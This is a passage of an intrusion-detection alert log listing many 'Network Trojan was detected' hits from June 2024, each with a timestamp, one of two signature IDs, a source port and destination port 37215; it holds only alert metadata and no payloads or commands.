              Timestamp:06/13/24-21:32:03.280029
              SID:2835222
              Source Port:49734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344859
              SID:2835222
              Source Port:40966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370509
              SID:2835222
              Source Port:41046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268756
              SID:2835222
              Source Port:33234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674323
              SID:2829579
              Source Port:54030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889623
              SID:2835222
              Source Port:47546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028075
              SID:2829579
              Source Port:43842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215640
              SID:2835222
              Source Port:47798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356166
              SID:2829579
              Source Port:54016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404143
              SID:2829579
              Source Port:50546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526214
              SID:2829579
              Source Port:49756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.779763
              SID:2835222
              Source Port:54504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440232
              SID:2835222
              Source Port:33354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.935562
              SID:2829579
              Source Port:49852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375856
              SID:2835222
              Source Port:52016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269553
              SID:2829579
              Source Port:57494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438825
              SID:2835222
              Source Port:47382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871996
              SID:2835222
              Source Port:43690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263933
              SID:2835222
              Source Port:50800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457441
              SID:2835222
              Source Port:35772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485127
              SID:2829579
              Source Port:34150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231918
              SID:2835222
              Source Port:37780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357040
              SID:2829579
              Source Port:34682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454156
              SID:2829579
              Source Port:38070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419838
              SID:2829579
              Source Port:38496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670522
              SID:2835222
              Source Port:34140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265637
              SID:2835222
              Source Port:34820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804036
              SID:2829579
              Source Port:40764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195740
              SID:2835222
              Source Port:36180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166856
              SID:2835222
              Source Port:39682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.479836
              SID:2829579
              Source Port:33978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872332
              SID:2829579
              Source Port:56656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248742
              SID:2829579
              Source Port:34976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438369
              SID:2835222
              Source Port:53056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886927
              SID:2835222
              Source Port:46232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457702
              SID:2835222
              Source Port:54894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040683
              SID:2835222
              Source Port:46078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026660
              SID:2835222
              Source Port:34066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611166
              SID:2829579
              Source Port:38424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677861
              SID:2829579
              Source Port:59850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275819
              SID:2829579
              Source Port:55914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460112
              SID:2829579
              Source Port:60102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096396
              SID:2835222
              Source Port:49642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611145
              SID:2835222
              Source Port:53842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844142
              SID:2829579
              Source Port:50094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255458
              SID:2835222
              Source Port:51372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611309
              SID:2829579
              Source Port:56180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.786221
              SID:2829579
              Source Port:47492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524903
              SID:2835222
              Source Port:33866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095924
              SID:2835222
              Source Port:41130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782377
              SID:2835222
              Source Port:39532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.693915
              SID:2829579
              Source Port:55410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152232
              SID:2829579
              Source Port:33390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224181
              SID:2829579
              Source Port:50254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841887
              SID:2835222
              Source Port:45118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258386
              SID:2835222
              Source Port:40472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097565
              SID:2829579
              Source Port:34768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403982
              SID:2829579
              Source Port:50312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417843
              SID:2835222
              Source Port:50522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611067
              SID:2829579
              Source Port:48978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729569
              SID:2835222
              Source Port:45296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544131
              SID:2835222
              Source Port:35294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372209
              SID:2829579
              Source Port:45278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911439
              SID:2829579
              Source Port:60414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.883983
              SID:2835222
              Source Port:47546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013691
              SID:2835222
              Source Port:45996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097964
              SID:2829579
              Source Port:33344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317297
              SID:2829579
              Source Port:53882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408616
              SID:2829579
              Source Port:40928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754876
              SID:2835222
              Source Port:44352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133452
              SID:2835222
              Source Port:34708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566525
              SID:2835222
              Source Port:37734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402942
              SID:2829579
              Source Port:49926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079117
              SID:2835222
              Source Port:44120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238712
              SID:2829579
              Source Port:47214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975141
              SID:2835222
              Source Port:54044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485436
              SID:2835222
              Source Port:60990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655320
              SID:2829579
              Source Port:46822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914738
              SID:2835222
              Source Port:57758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995941
              SID:2835222
              Source Port:58034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487858
              SID:2835222
              Source Port:54976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424958
              SID:2829579
              Source Port:57890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088141
              SID:2829579
              Source Port:43364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.277300
              SID:2835222
              Source Port:58126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994812
              SID:2829579
              Source Port:47360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231315
              SID:2829579
              Source Port:50460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657772
              SID:2835222
              Source Port:51214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611690
              SID:2835222
              Source Port:58970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320210
              SID:2829579
              Source Port:35336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.178149
              SID:2835222
              Source Port:50838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135784
              SID:2829579
              Source Port:54070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245571
              SID:2829579
              Source Port:46612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726285
              SID:2835222
              Source Port:48234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912761
              SID:2829579
              Source Port:36460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177971
              SID:2829579
              Source Port:35478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508383
              SID:2829579
              Source Port:49520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011456
              SID:2829579
              Source Port:48486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407931
              SID:2829579
              Source Port:47786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309717
              SID:2835222
              Source Port:47340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725389
              SID:2835222
              Source Port:39796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889862
              SID:2835222
              Source Port:45328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786947
              SID:2835222
              Source Port:59168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404570
              SID:2829579
              Source Port:35286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048615
              SID:2835222
              Source Port:43062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127497
              SID:2835222
              Source Port:34686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229051
              SID:2829579
              Source Port:48340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.789158
              SID:2835222
              Source Port:33896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091258
              SID:2829579
              Source Port:54602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055536
              SID:2829579
              Source Port:44386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230828
              SID:2835222
              Source Port:48194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.218454
              SID:2835222
              Source Port:36260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153200
              SID:2829579
              Source Port:35822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192493
              SID:2829579
              Source Port:51014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125732
              SID:2829579
              Source Port:40152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079428
              SID:2835222
              Source Port:35648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323377
              SID:2829579
              Source Port:45050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824365
              SID:2829579
              Source Port:37058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418944
              SID:2835222
              Source Port:48810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093735
              SID:2829579
              Source Port:56822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109315
              SID:2829579
              Source Port:57838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097020
              SID:2829579
              Source Port:45060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707511
              SID:2829579
              Source Port:34734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253766
              SID:2829579
              Source Port:36176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440121
              SID:2829579
              Source Port:45536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408478
              SID:2835222
              Source Port:33632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417263
              SID:2829579
              Source Port:41308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730522
              SID:2829579
              Source Port:43946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158614
              SID:2829579
              Source Port:53660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059533
              SID:2829579
              Source Port:56206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659290
              SID:2829579
              Source Port:47356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871151
              SID:2829579
              Source Port:50664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.038353
              SID:2835222
              Source Port:42468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569538
              SID:2835222
              Source Port:42124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680720
              SID:2835222
              Source Port:55362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177678
              SID:2835222
              Source Port:36830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353828
              SID:2829579
              Source Port:36540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085536
              SID:2829579
              Source Port:38380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373649
              SID:2835222
              Source Port:53590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157456
              SID:2835222
              Source Port:42080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.866844
              SID:2829579
              Source Port:48514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197067
              SID:2835222
              Source Port:48390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660410
              SID:2829579
              Source Port:37782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042832
              SID:2829579
              Source Port:55426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372517
              SID:2829579
              Source Port:56126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991990
              SID:2829579
              Source Port:60382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092151
              SID:2835222
              Source Port:55808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677187
              SID:2835222
              Source Port:41722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834961
              SID:2829579
              Source Port:42124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.932230
              SID:2829579
              Source Port:53580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632500
              SID:2835222
              Source Port:41744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152534
              SID:2835222
              Source Port:36458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451618
              SID:2829579
              Source Port:41776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405100
              SID:2835222
              Source Port:53854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977422
              SID:2835222
              Source Port:37198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107155
              SID:2829579
              Source Port:51842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544062
              SID:2829579
              Source Port:40554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359128
              SID:2829579
              Source Port:42644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.101135
              SID:2829579
              Source Port:58982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485888
              SID:2835222
              Source Port:59174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696107
              SID:2829579
              Source Port:34868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475837
              SID:2835222
              Source Port:38192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991949
              SID:2829579
              Source Port:41286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.837233
              SID:2829579
              Source Port:36442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751750
              SID:2829579
              Source Port:55070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420377
              SID:2829579
              Source Port:58594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608772
              SID:2829579
              Source Port:45416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834905
              SID:2829579
              Source Port:51246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263888
              SID:2829579
              Source Port:51800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241642
              SID:2835222
              Source Port:42322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344321
              SID:2829579
              Source Port:57538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697657
              SID:2829579
              Source Port:49046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166805
              SID:2829579
              Source Port:44350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669123
              SID:2835222
              Source Port:42442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710921
              SID:2835222
              Source Port:58168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246018
              SID:2829579
              Source Port:50156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.570290
              SID:2835222
              Source Port:39150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507830
              SID:2835222
              Source Port:45812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450318
              SID:2829579
              Source Port:46294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869765
              SID:2829579
              Source Port:36864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028219
              SID:2835222
              Source Port:35624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089241
              SID:2835222
              Source Port:43134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485324
              SID:2829579
              Source Port:50894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679625
              SID:2835222
              Source Port:60314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043070
              SID:2835222
              Source Port:43386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551143
              SID:2829579
              Source Port:35910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457052
              SID:2835222
              Source Port:37064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606039
              SID:2835222
              Source Port:45890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306547
              SID:2835222
              Source Port:44912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.997287
              SID:2829579
              Source Port:41326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633377
              SID:2835222
              Source Port:43454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671041
              SID:2829579
              Source Port:42890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636269
              SID:2829579
              Source Port:37884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609352
              SID:2829579
              Source Port:56676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.615110
              SID:2829579
              Source Port:50002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871428
              SID:2835222
              Source Port:34566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457504
              SID:2829579
              Source Port:47670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238286
              SID:2829579
              Source Port:45102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711380
